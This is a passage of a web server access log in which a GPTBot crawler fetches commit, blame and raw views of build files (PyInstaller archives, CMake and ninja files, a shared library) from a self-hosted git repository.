3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:01:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 9918] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +[17/Feb/2026:16:01:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 9914] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:16:01:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:01:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:16:01:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 9882] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:16:01:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +[17/Feb/2026:16:01:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 9909] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:01:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:01:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10426] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:01:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 13193004] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +[17/Feb/2026:16:01:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 100826] [Gzip 29.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:16:01:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11046] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:01:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 99693] [Gzip 29.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:16:01:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10215] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 13192985] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +[17/Feb/2026:16:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17035] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10203] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14100] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:01:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12993] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:01:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10217] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:01:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11897] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:01:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:02:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 11009] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:02:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 4184405] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +[17/Feb/2026:16:02:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17752] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:16:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 159003] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:16:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17051] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:16:02:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:16:02:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17963] [Gzip 11.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:16:02:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:16:02:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10225] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:02:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:02:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11084] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:02:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10006] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:02:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14154] [Gzip 5.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:02:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10229] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:02:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:02:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 70927] [Gzip 29.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:02:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:02:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 69020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:16:02:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 71910] [Gzip 17.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:16:02:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 159003] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:16:02:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 73286] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:16:02:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 38620] [Gzip 14.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:16:02:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 37048] [Gzip 14.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:16:02:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11026] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build" +[17/Feb/2026:16:02:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 72074] [Gzip 17.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:16:02:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 72025] [Gzip 17.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 